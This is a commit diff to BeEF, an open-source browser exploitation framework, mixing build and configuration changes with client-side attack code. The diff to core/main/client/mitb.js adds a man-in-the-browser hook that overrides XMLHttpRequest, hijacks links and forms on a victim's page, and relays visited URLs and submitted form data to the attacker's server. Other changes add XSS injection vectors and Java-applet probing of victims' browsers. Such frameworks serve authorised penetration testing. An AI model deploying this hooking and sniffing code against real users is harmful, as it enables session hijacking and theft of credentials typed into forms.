Save wireless configuration xml created by Get_wireless_keys module to temp folder

Part of issue #47

.gitignore

@@ -1,2 +1,3 @@
 beef.db
 test/msf-test
+custom-config.yaml

Gemfile

@@ -25,6 +25,7 @@ else
 end
 
 gem "thin"
+gem "sinatra", "1.3.2"
 gem "ansi"
 gem "term-ansicolor", :require => "term/ansicolor"
 gem "dm-core"
@@ -48,6 +49,8 @@ if ENV['BEEF_TEST']
   # sudo apt-get install libxslt-dev libxml2-dev
   # sudo port install libxml2 libxslt
   gem "capybara"
+  #RESTful API tests/generic command module tests
+  gem "rest-client", "~> 1.6.7"
 end
 
 source "http://rubygems.org"

Gemfile.lock

@@ -1,52 +0,0 @@
-GEM
-  remote: http://rubygems.org/
-  specs:
-    addressable (2.2.6)
-    ansi (1.4.1)
-    daemons (1.1.5)
-    data_objects (0.10.7)
-      addressable (~> 2.1)
-    dm-core (1.2.0)
-      addressable (~> 2.2.6)
-    dm-do-adapter (1.2.0)
-      data_objects (~> 0.10.6)
-      dm-core (~> 1.2.0)
-    dm-migrations (1.2.0)
-      dm-core (~> 1.2.0)
-    dm-sqlite-adapter (1.2.0)
-      dm-do-adapter (~> 1.2.0)
-      do_sqlite3 (~> 0.10.6)
-    do_sqlite3 (0.10.7)
-      data_objects (= 0.10.7)
-    erubis (2.7.0)
-    eventmachine (0.12.10)
-    json (1.6.4)
-    librex (0.0.52)
-    msfrpc-client (1.0.1)
-      librex (>= 0.0.32)
-      msgpack (>= 0.4.5)
-    msgpack (0.4.6)
-    parseconfig (0.5.2)
-    rack (1.4.0)
-    term-ansicolor (1.0.7)
-    thin (1.3.1)
-      daemons (>= 1.0.9)
-      eventmachine (>= 0.12.6)
-      rack (>= 1.0.0)
-
-PLATFORMS
-  ruby
-
-DEPENDENCIES
-  ansi
-  data_objects
-  dm-core
-  dm-migrations
-  dm-sqlite-adapter
-  erubis
-  eventmachine (= 0.12.10)
-  json
-  msfrpc-client
-  parseconfig
-  term-ansicolor
-  thin

Rakefile

@@ -56,7 +56,7 @@ task :msf => ["install", "msf_install"]  do
 end
 
 task :install do
-  sh "export BEEF_TEST=true;bundle install > /dev/null"
+  sh "export BEEF_TEST=true;bundle install"
 end
 
 ################################

VERSION

@@ -14,4 +14,4 @@
 #   limitations under the License.
 #
 
-0.4.3.2-alpha
+0.4.3.3-alpha

beef

@@ -41,15 +41,26 @@ end
 # @note Require core loader's
 require 'core/loader'
 
-# @note Starts configuration system
-config = BeEF::Core::Configuration.instance
+# @note Initialize the Configuration object. Eventually loads a different config.yaml if -c flag was passed.
+if BeEF::Core::Console::CommandLine.parse[:ext_config].empty?
+  config = BeEF::Core::Configuration.new("#{$root_dir}/config.yaml")
+else
+  config = BeEF::Core::Configuration.new("#{$root_dir}/#{BeEF::Core::Console::CommandLine.parse[:ext_config]}")
+end
+
+# @note After the BeEF core is loaded, bootstrap the rest of the framework internals
+require 'core/bootstrap'
 
 # @note Loads enabled extensions
 BeEF::Extensions.load
 
+# @note Prints the BeEF ascii art if the -a flag was passed
+if BeEF::Core::Console::CommandLine.parse[:ascii_art] == true
+  BeEF::Core::Console::Banners.print_ascii_art
+end
+
 # @note Prints BeEF welcome message
-#BeEF::Extension::Console::Banners.print_ascii_art
-BeEF::Extension::Console::Banners.print_welcome_msg
+BeEF::Core::Console::Banners.print_welcome_msg
 
 # @note Loads enabled modules
 BeEF::Modules.load
@@ -75,8 +86,7 @@ case config.get("beef.database.driver")
 end
 
 # @note Resets the database if the -x flag was passed
-# @todo Change reference from Extension::Console to Core::Console once the console extension is merged with the core
-if BeEF::Extension::Console.resetdb?
+if BeEF::Core::Console::CommandLine.parse[:resetdb]
   print_info 'Resetting the database for BeEF.'
   DataMapper.auto_migrate!
 else
@@ -94,10 +104,13 @@ http_hook_server = BeEF::Core::Server.instance
 http_hook_server.prepare
 
 # @note Prints information back to the user before running the server
-BeEF::Extension::Console::Banners.print_loaded_extensions
-BeEF::Extension::Console::Banners.print_loaded_modules
-BeEF::Extension::Console::Banners.print_network_interfaces_count
-BeEF::Extension::Console::Banners.print_network_interfaces_routes
+BeEF::Core::Console::Banners.print_loaded_extensions
+BeEF::Core::Console::Banners.print_loaded_modules
+BeEF::Core::Console::Banners.print_network_interfaces_count
+BeEF::Core::Console::Banners.print_network_interfaces_routes
+
+#@note Prints the API key needed to use the RESTful API
+print_info "RESTful API key: #{BeEF::Core::Crypto::api_token}"
 
 # @note Call the API method 'pre_http_start'
 BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'pre_http_start', http_hook_server)

config.yaml

@@ -16,14 +16,14 @@
 # BeEF Configuration file
 
 beef:
-    version: '0.4.3.2-alpha'
+    version: '0.4.3.3-alpha'
     debug: false
 
     restrictions:
         # subnet of browser ip addresses that can hook to the framework 
         permitted_hooking_subnet: "0.0.0.0/0"
         # subnet of browser ip addresses that can connect to the UI 
-        # permitted_ui_subnet = "127.0.0.1/32"
+        # permitted_ui_subnet: "127.0.0.1/32"
         permitted_ui_subnet: "0.0.0.0/0"
     
     http:
@@ -37,6 +37,11 @@ beef:
         hook_file: "/hook.js"
         hook_session_name: "BEEFHOOK"
         session_cookie_name: "BEEFSESSION"
+        # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
+        web_server_imitation:
+                        enable: false
+                        #supported: apache, iis
+                        type: "apache"
 
     database:
         # For information on using other databases please read the

core/api.rb

@@ -60,10 +60,9 @@ module BeEF
       # @param [String] method the method of the class
       # @param [Array] params an array of parameters that need to be matched
       # @return [Boolean] whether or not the owner is registered
-      # @todo Change the param matching to use the new :is_matched_params?() method - Issue #479
       def registered?(owner, c, method, params = [])
         @registry.each{|r|
-          if r['owner'] == owner and r['class'] == c and r['method'] == method and params == r['params']
+          if r['owner'] == owner and r['class'] == c and r['method'] == method and self.is_matched_params?(r, params)
             return true
           end
         }

core/bootstrap.rb

@@ -0,0 +1,53 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+module BeEF
+  module Core
+
+  end
+end
+
+## @note Include the BeEF router
+require 'core/main/router/router'
+require 'core/main/router/api'
+
+
+## @note Include http server functions for beef
+require 'core/main/server'
+require 'core/main/handlers/modules/beefjs'
+require 'core/main/handlers/modules/command'
+require 'core/main/handlers/commands'
+require 'core/main/handlers/hookedbrowsers'
+
+# @note Include the network stack
+require 'core/main/network_stack/handlers/dynamicreconstruction'
+require 'core/main/network_stack/assethandler'
+require 'core/main/network_stack/api'
+
+# @note Include the distributed engine
+require 'core/main/distributed_engine/models/rules'
+
+## @note Include helpers
+require 'core/module'
+require 'core/modules'
+require 'core/extension'
+require 'core/extensions'
+require 'core/hbmanager'
+
+## @note Include RESTful API
+require 'core/main/rest/handlers/hookedbrowsers'
+require 'core/main/rest/handlers/modules'
+require 'core/main/rest/handlers/logs'
+require 'core/main/rest/api'

core/core.rb

@@ -26,9 +26,6 @@ require 'core/main/models/hookedbrowser'
 require 'core/main/models/log'
 require 'core/main/models/command'
 require 'core/main/models/result'
-require 'core/main/models/dynamiccommandinfo'
-require 'core/main/models/dynamicpayloadinfo'
-require 'core/main/models/dynamicpayloads'
 require 'core/main/models/optioncache'
 
 # @note Include the constants
@@ -44,20 +41,8 @@ require 'core/main/crypto'
 require 'core/main/logger'
 require 'core/main/migration'
 
-# @note Include http server functions for beef
-require 'core/main/server'
+# @note Include the command line parser and the banner printer
+require 'core/main/console/commandline'
+require 'core/main/console/banners'
 
-require 'core/main/handlers/modules/beefjs'
-require 'core/main/handlers/modules/command'
-
-require 'core/main/handlers/commands'
-require 'core/main/handlers/hookedbrowsers'
-
-# @note Include the network stack
-require 'core/main/network_stack/handlers/dynamicreconstruction'
-require 'core/main/network_stack/assethandler'
-require 'core/main/network_stack/api'
-
-# @note Include the distributed engine
-require 'core/main/distributed_engine/models/rules'
 

core/loader.rb

@@ -38,11 +38,4 @@ require 'core/api'
 require 'core/settings'
 
 # @note Include the core of BeEF
-require 'core/core'
-
-# @note Include helpers
-require 'core/module'
-require 'core/modules'
-require 'core/extension'
-require 'core/extensions'
-require 'core/hbmanager'
+require 'core/core'

core/main/client/browser.js

@@ -48,9 +48,8 @@ beef.browser = {
 	 * Returns true if IE8.
 	 * @example: beef.browser.isIE8()
 	 */
-	isIE8: function() {						
-		$j("body").append('<!--[if IE 8]>     <div id="beefiecheck" class="ie ie8"></div>      <![endif]-->');
-		return ($j('#beefiecheck').hasClass('ie8'))?true:false;
+	isIE8: function() {
+		return !!window.XMLHttpRequest && !window.chrome && !window.opera && !window.getComputedStyle && !!document.documentMode && !!window.XDomainRequest && !window.performance;
 	},
 	
 	/**
@@ -58,8 +57,7 @@ beef.browser = {
 	 * @example: beef.browser.isIE9()
 	 */
 	isIE9: function() {
-		$j("body").append('<!--[if IE 9]>     <div id="beefiecheck" class="ie ie9"></div>      <![endif]-->');
-		return ($j('#beefiecheck').hasClass('ie9'))?true:false;
+		return !!window.XMLHttpRequest && !window.chrome && !window.opera && !window.getComputedStyle && !!document.documentMode && !!window.XDomainRequest && !!window.performance;
 	},
 	
 	/**
@@ -158,12 +156,28 @@ beef.browser = {
 		return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/10\./) != null;
 	},
 
+	/**
+	 * Returns true if FF11.
+	 * @example: beef.browser.isFF11()
+	 */
+	isFF11: function() {
+		return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/11\./) != null;
+	},
+
+	/**
+	 * Returns true if FF12
+* @example: beef.browser.isFF12()
+	 */
+	isFF12: function() {
+return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/12\./) != null;
+	},
+
 	/**
 	 * Returns true if FF.
 	 * @example: beef.browser.isFF()
 	 */
 	isFF: function() {
-		return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10();
+		return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12();
 	},
 
 	/**
@@ -377,6 +391,8 @@ beef.browser = {
 			FF8:	this.isFF8(),	// Firefox 8
 			FF9:	this.isFF9(),	// Firefox 9
 			FF10:	this.isFF10(),	// Firefox 10
+			FF11:	this.isFF11(),	// Firefox 11
+			FF12:	this.isFF12(),	// Firefox 12
 			FF:	this.isFF(),	// Firefox any version
 
 			IE6:	this.isIE6(),	// Internet Explorer 6
@@ -431,7 +447,8 @@ beef.browser = {
 		if (this.isFF8())	{ return '8'  };	// Firefox 8
 		if (this.isFF9())	{ return '9'  };	// Firefox 9
 		if (this.isFF10())	{ return '10' };	// Firefox 10
-
+		if (this.isFF11())	{ return '11' };	// Firefox 11
+		if (this.isFF12())	{ return '12' };	// Firefox 12
 
 		if (this.isIE6())	{ return '6'  };	// Internet Explorer 6
 		if (this.isIE7())	{ return '7'  };	// Internet Explorer 7
@@ -492,7 +509,19 @@ beef.browser = {
 			return flash_installed;
 		}
 	},
+
+	/**
+	* Checks if the zombie has Java enabled.
+ 	 * @return: {Boolean} true or false.
+     *
+     * @example: if(beef.browser.javaEnabled()) { ... }
+     */
+	javaEnabled: function() {
+
+		return (!!window.navigator.javaEnabled());
 	
+	},
+
 	/**
 	 * Checks if the zombie has Java installed and enabled.
 	 * @return: {Boolean} true or false.
@@ -500,9 +529,34 @@ beef.browser = {
 	 * @example: if(beef.browser.hasJava()) { ... }
 	 */
 	hasJava: function() {
-		if(!this.type().IE && window.navigator.javaEnabled && window.navigator.javaEnabled()) {
+
+		// Check if Java is enabled
+		if (!beef.browser.javaEnabled()) {
+			return false;
+		}
+
+        // This is a temporary fix as this does not work on Safari and Chrome
+		// Chrome requires manual user intervention even with unsigned applets.
+		// Safari requires a few seconds to load the applet.
+		if (beef.browser.isC() || beef.browser.isS()) {
 			return true;
 		}
+
+		// Inject an unsigned java applet to double check if the Java
+		// plugin is working fine.
+		try {
+			var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/demos/checkJava.jar';
+   				var applet_id = 'checkJava';
+   				var applet_name = 'checkJava';
+   				var output;
+   				beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'checkJava' ,
+  				null, applet_archive, null);
+   				output = document.Microsoft_Corporation.getInfo();
+			beef.dom.detachApplet('checkJava');
+			return output = 1;
+		} catch(e) {
+			return false;
+		}
 		return false;
 	},
 	
@@ -674,12 +728,10 @@ beef.browser = {
 		var browser_plugins = beef.browser.getPlugins();
 		var os_name = beef.os.getName();
 		var system_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null;
-		var internal_ip = beef.net.local.getLocalAddress();
-		var internal_hostname = beef.net.local.getLocalHostname();
 		var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {if (value == true) return value; else if (typeof value == 'object') return value; else return;});
 		var screen_params = beef.browser.getScreenParams();
 		var window_size = beef.browser.getWindowSize();
-		var java_enabled = (beef.browser.hasJava())? "Yes" : "No";
+		var java_enabled = (beef.browser.javaEnabled())? "Yes" : "No";
 		var vbscript_enabled=(beef.browser.hasVBScript())? "Yes" : "No";
 		var has_flash = (beef.browser.hasFlash())? "Yes" : "No";
 		var has_googlegears=(beef.browser.hasGoogleGears())? "Yes":"No";
@@ -700,12 +752,10 @@ beef.browser = {
 		if(browser_plugins) details["BrowserPlugins"] = browser_plugins;
 		if(os_name) details['OsName'] = os_name;
 		if(system_platform) details['SystemPlatform'] = system_platform;
-		if(internal_ip) details['InternalIP'] = internal_ip;
-		if(internal_hostname) details['InternalHostname'] = internal_hostname;
 		if(browser_type) details['BrowserType'] = browser_type;
 		if(screen_params) details['ScreenParams'] = screen_params;
 		if(window_size) details['WindowSize'] = window_size;
-		if(java_enabled) details['JavaEnabled'] = java_enabled
+		if(java_enabled) details['JavaEnabled'] = java_enabled;
 		if(vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled
 		if(has_flash) details['HasFlash'] = has_flash
 		if(has_web_socket) details['HasWebSocket'] = has_web_socket

core/main/client/mitb.js

@@ -1,135 +1,256 @@
-//
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
-//
-
-beef.mitb = {
-	
-	cid: null,
-	curl: null,
-	
-	init: function(cid, curl){
-		beef.mitb.cid = cid;
-		beef.mitb.curl = curl;
-	},
-	
-	// Initializes the hook on anchors and forms.
-	hook: function(){ 	
-		beef.onpopstate.push(function(event) {beef.mitb.fetch(document.location, document.getElementsByTagName("html")[0]);});
-		beef.onclose.push(function(event) {beef.mitb.endSession();});
-		var anchors = document.getElementsByTagName("a");
-		var forms = document.getElementsByTagName("form");
-		for(var i=0;i<anchors.length;i++){
-			anchors[i].onclick = beef.mitb.poisonAnchor;
-		}
-		for(var i=0;i<forms.length;i++){
-			beef.mitb.poisonForm(forms[i]);
-		}
-	},
-	
-	// Hooks anchors and prevents them from linking away
-	poisonAnchor: function(e){
-		try{
-			e.preventDefault;
-			if(beef.mitb.fetch(e.currentTarget, document.getElementsByTagName("html")[0])){
-				var title = "";
-				if(document.getElementsByTagName("title").length == 0){
-					title = document.title;
-				}else{
-					title = document.getElementsByTagName("title")[0].innerHTML;
-				}
-				history.pushState({ Be: "EF" }, title, e.currentTarget);
-			}
-		}catch(e){
-			console.error('beef.mitb.poisonAnchor - failed to execute: ' + e.message);
-		}
-		return false;
-	},
-	
-	// Hooks forms and prevents them from linking away
-	poisonForm: function(form){
-		form.onsubmit=function(e){
-			var inputs = form.getElementsByTagName("input");
-			var query = "";
-			for(var i=0;i<inputs.length;i++){
-				if(i>0 && i<inputs.length-1) query += "&";
-				switch(inputs[i].type){
-					case "submit":
-						break;
-					default:
-						query += inputs[i].name + "=" + inputs[i].value;
-						break;
-				}
-			}
-			e.preventdefault;
-			beef.mitb.fetchForm(form.action, query, document.getElementsByTagName("html")[0]);
-			history.pushState({ Be: "EF" }, "", form.action);
-			return false;
-		}
-	},
-	
-	// Fetches a hooked form with AJAX
-	fetchForm: function(url, query, target){
-		try{
-			var y = new XMLHttpRequest();
-			y.open('POST', url, false);
-			y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
-			y.onreadystatechange = function(){
-				if(y.readyState == 4 && y.responseText != ""){
-					target.innerHTML = y.responseText;
-					setTimeout(beef.mitb.hook, 10);
-				}
-			}
-			y.send(query);
-			beef.mitb.sniff("POST: "+url+" ["+query+"]");
-			return true;
-		}catch(x){
-			return false;
-		}
-	},
-	
-	// Fetches a hooked link with AJAX
-	fetch: function(url, target){
-		try{
-			var y = new XMLHttpRequest();
-			y.open('GET', url,false);
-			y.onreadystatechange = function(){
-				if(y.readyState == 4 && y.responseText != ""){
-					target.innerHTML = y.responseText;
-					setTimeout(beef.mitb.hook, 10);
-				}
-			}
-			y.send(null);
-			beef.mitb.sniff("GET: "+url);
-			return true;
-		}catch(x){
-			window.open(url);
-			beef.mitb.sniff("GET [New Window]: "+url);
-			return false;
-		}
-	},
-	
-	// Relays an entry to the framework
-	sniff: function(result){
-		try{
-			beef.net.send(beef.mitb.cid, beef.mitb.curl, result);
-		}catch(x){}
-		return true;
-	},
-	
-	// Signals the Framework that the user has lost the hook
-	endSession: function(){
-		beef.mitb.sniff("Window closed.");
-	}
-}
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+
+beef.mitb = {
+
+    cid:null,
+    curl:null,
+
+    init:function (cid, curl) {
+        beef.mitb.cid = cid;
+        beef.mitb.curl = curl;
+        /*Override open method to intercept ajax request*/
+        var xml_type;
+
+        if (window.XMLHttpRequest && !(window.ActiveXObject)) {
+
+            xml_type = 'XMLHttpRequest';
+        }
+
+        if (xml_type == "XMLHttpRequest") {
+            beef.mitb.sniff("Method XMLHttpRequest.open override");
+            (function (open) {
+                XMLHttpRequest.prototype.open = function (method, url, async, user, pass) {
+
+                    var portRegex = new RegExp(":[0-9]+");
+                    var portR = portRegex.exec(url);
+                    /*return :port*/
+                    var requestPort;
+
+                    if (portR != null) {
+                        requestPort = portR[0].split(":");
+                    }
+
+                    if ((user == "beef") && (pass == "beef")) {
+                        /*a poisoned something*/
+                        open.call(this, method, url, async, null, null);
+                    }
+
+
+                    else if (url.indexOf("hook.js") != -1 || url.indexOf("/dh?") != -1) {
+                        /*a beef hook.js polling or dh */
+                        open.call(this, method, url, async, null, null);
+                    }
+
+                    else {
+
+                        if (method == "GET") {
+                            if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
+                                beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
+                                window.open(url);
+
+                            }
+                            else {
+                                beef.mitb.sniff("GET [Ajax Request]: " + url);
+                                if (beef.mitb.fetch(url, document.getElementsByTagName("html")[0])) {
+                                    var title = "";
+                                    if (document.getElementsByTagName("title").length == 0) {
+                                        title = document.title;
+                                    } else {
+                                        title = document.getElementsByTagName("title")[0].innerHTML;
+                                    }
+                                    /*write the url of the page*/
+                                    history.pushState({ Be:"EF" }, title, url);
+
+                                }
+
+                            }
+
+                        }
+                        else {
+                            /*if we are here we have an ajax post req*/
+                            beef.mitb.sniff("Post ajax request to: " + url);
+                            open.call(this, method, url, async, user, pass);
+
+                        }
+                    }
+                };
+            })(XMLHttpRequest.prototype.open);
+
+        }
+
+    },
+
+    // Initializes the hook on anchors and forms.
+    hook:function () {
+        beef.onpopstate.push(function (event) {
+            beef.mitb.fetch(document.location, document.getElementsByTagName("html")[0]);
+        });
+        beef.onclose.push(function (event) {
+            beef.mitb.endSession();
+        });
+
+        var anchors = document.getElementsByTagName("a");
+        var forms = document.getElementsByTagName("form");
+        var lis = document.getElementsByTagName("li");
+
+        for (var i = 0; i < anchors.length; i++) {
+            anchors[i].onclick = beef.mitb.poisonAnchor;
+        }
+        for (var i = 0; i < forms.length; i++) {
+            beef.mitb.poisonForm(forms[i]);
+        }
+
+        for (var i = 0; i < lis.length; i++) {
+            if (lis[i].hasAttribute("onclick")) {
+                lis[i].removeAttribute("onclick");
+                /*clear*/
+                lis[i].setAttribute("onclick", "beef.mitb.fetchOnclick('" + lis[i].getElementsByTagName("a")[0] + "')");
+                /*override*/
+
+            }
+        }
+    },
+
+    // Hooks anchors and prevents them from linking away
+    poisonAnchor:function (e) {
+        try {
+            e.preventDefault;
+            if (beef.mitb.fetch(e.currentTarget, document.getElementsByTagName("html")[0])) {
+                var title = "";
+                if (document.getElementsByTagName("title").length == 0) {
+                    title = document.title;
+                } else {
+                    title = document.getElementsByTagName("title")[0].innerHTML;
+                }
+                history.pushState({ Be:"EF" }, title, e.currentTarget);
+            }
+        } catch (e) {
+            console.error('beef.mitb.poisonAnchor - failed to execute: ' + e.message);
+        }
+        return false;
+    },
+
+    // Hooks forms and prevents them from linking away
+    poisonForm:function (form) {
+        form.onsubmit = function (e) {
+            var inputs = form.getElementsByTagName("input");
+            var query = "";
+            for (var i = 0; i < inputs.length; i++) {
+                if (i > 0 && i < inputs.length - 1) query += "&";
+                switch (inputs[i].type) {
+                    case "submit":
+                        break;
+                    default:
+                        query += inputs[i].name + "=" + inputs[i].value;
+                        break;
+                }
+            }
+            e.preventdefault;
+            beef.mitb.fetchForm(form.action, query, document.getElementsByTagName("html")[0]);
+            history.pushState({ Be:"EF" }, "", form.action);
+            return false;
+        }
+    },
+
+    // Fetches a hooked form with AJAX
+    fetchForm:function (url, query, target) {
+        try {
+            var y = new XMLHttpRequest();
+            y.open('POST', url, false, "beef", "beef");
+            y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
+            y.onreadystatechange = function () {
+                if (y.readyState == 4 && y.responseText != "") {
+                    target.innerHTML = y.responseText;
+                    setTimeout(beef.mitb.hook, 10);
+                }
+            }
+            y.send(query);
+            beef.mitb.sniff("POST: " + url + "[" + query + "]");
+            return true;
+        } catch (x) {
+            return false;
+        }
+    },
+
+    // Fetches a hooked link with AJAX
+    fetch:function (url, target) {
+        try {
+            var y = new XMLHttpRequest();
+            y.open('GET', url, false, "beef", "beef");
+            y.onreadystatechange = function () {
+                if (y.readyState == 4 && y.responseText != "") {
+
+                    target.innerHTML = y.responseText;
+                    setTimeout(beef.mitb.hook, 10);
+                }
+            }
+            y.send(null);
+            beef.mitb.sniff("GET: " + url);
+            return true;
+        } catch (x) {
+            window.open(url);
+            beef.mitb.sniff("GET [New Window]: " + url);
+            return false;
+        }
+    },
+
+    // Fetches a window.location=http://domainname.com and setting up history
+    fetchOnclick:function (url) {
+        try {
+            var target = document.getElementsByTagName("html")[0];
+            var y = new XMLHttpRequest();
+            y.open('GET', url, false, "beef", "beef");
+            y.onreadystatechange = function () {
+                if (y.readyState == 4 && y.responseText != "") {
+                    var title = "";
+                    if (document.getElementsByTagName("title").length == 0) {
+                        title = document.title;
+                    }
+                    else {
+                        title = document.getElementsByTagName("title")[0].innerHTML;
+                        }
+                    history.pushState({ Be:"EF" }, title, url);
+                    target.innerHTML = y.responseText;
+                    setTimeout(beef.mitb.hook, 10);
+                }
+            }
+            y.send(null);
+            beef.mitb.sniff("GET: " + url);
+
+        } catch (x) {
+
+
+            window.open(url);
+            beef.mitb.sniff("GET [New Window]: " + url);
+
+        }
+    },
+
+    // Relays an entry to the framework
+    sniff:function (result) {
+        try {
+            beef.net.send(beef.mitb.cid, beef.mitb.curl, result);
+        } catch (x) {
+        }
+        return true;
+    },
+
+    // Signals the Framework that the user has lost the hook
+    endSession:function () {
+        beef.mitb.sniff("Window closed.");
+    }
+}

core/main/client/net/local.js

@@ -21,6 +21,8 @@
 beef.net.local = {
 	
 	sock: false,
+	checkJava: false,
+	hasJava: false,
 	
 	/**
 	 * Initializes the java socket. We have to use this method because
@@ -29,16 +31,30 @@ beef.net.local = {
 	 * is invalid:
 	 * sock: new java.net.Socket();
 	 */
+
 	initializeSocket: function() {
-		if(! beef.browser.hasJava()) return -1;
-		
-		try {
-			this.sock = new java.net.Socket();
-		} catch(e) {
-			return -1;
+		if(this.checkJava){	
+			if(!beef.browser.hasJava()) {
+				this.checkJava=True;
+				this.hasJava=False;
+				return -1;
+			}else{
+				this.checkJava=True;
+				this.hasJava=True;
+				return 1;
+			}
+		}
+		else{
+			if(!this.hasJava) return -1;
+			else{	
+				try {
+					this.sock = new java.net.Socket();
+				} catch(e) {
+					return -1;
+				}
+				return 1;
+			}
 		}
-		
-		return 1;
 	},
 	
 	/**
@@ -47,7 +63,7 @@ beef.net.local = {
 	 * @error: return -1 if the internal ip cannot be retrieved.
 	 */
 	getLocalAddress: function() {
-		if(! beef.browser.hasJava()) return false;
+		if(!this.hasJava) return false;
 		
 		this.initializeSocket();
 		
@@ -65,7 +81,7 @@ beef.net.local = {
 	 * @error: return -1 if the hostname cannot be retrieved.
 	 */
 	getLocalHostname: function() {
-		if(! beef.browser.hasJava()) return false;
+		if(!this.hasJava) return false;
 		
 		this.initializeSocket();
 		
@@ -79,4 +95,4 @@ beef.net.local = {
 	
 };
 
-beef.regCmp('beef.net.local');
+beef.regCmp('beef.net.local');

core/main/client/net/xssrays.js

@@ -50,19 +50,19 @@ beef.net.xssrays = {
     vectors: [
 
 //				  {input:"',XSS,'", name: 'Standard DOM based injection single', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:'",XSS,"', name: 'Standard DOM based injection double', browser: 'ALL',url:true,form:true,path:true},
-//        {input: '\'><script>XSS<\/script>', name: 'Standard script injection single', browser: 'ALL',url:true,form:true,path:true},
-        {input: '"><script>XSS<\/script>', name: 'Standard script injection double', browser: 'ALL',url:true,form:true,path:true}, //,
-		{input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true}
+				  {input:'",XSS,"', name: 'Standard DOM based injection double', browser: 'ALL',url:true,form:true,path:true},
+//				  {input:'\'><script>XSS<\/script>', name: 'Standard script injection single', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'"><script>XSS<\/script>', name: 'Standard script injection double', browser: 'ALL',url:true,form:true,path:true}, //,
+//				  {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true}
 //				  {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
 //				  {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
-//        {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true}
+//				  {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
 //				  {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
 //				  {input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
-//  				  {input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
-//  				  {input:'null,XSS//', name: 'Unfiltered DOM injection comma', browser: 'ALL',url:true,form:true,path:true},
-        //{input:'null\nXSS//', name: 'Unfiltered DOM injection new line', browser: 'ALL',url:true,form:true,path:true}
+  				  {input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
+  				  {input:'null,XSS//', name: 'Unfiltered DOM injection comma', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'null\nXSS//', name: 'Unfiltered DOM injection new line', browser: 'ALL',url:true,form:true,path:true}
     ],
     uniqueID: 0,
     rays: [],

core/main/command.rb

@@ -108,7 +108,7 @@ module BeEF
       # Sets the datastore for the callback function. This function is meant to be called by the CommandHandler
       # @param [Hash] http_params HTTP parameters
       # @param [Hash] http_headers HTTP headers
-      def build_callback_datastore(http_params, http_headers)
+      def build_callback_datastore(http_params, http_headers, result, command_id, beefhook)
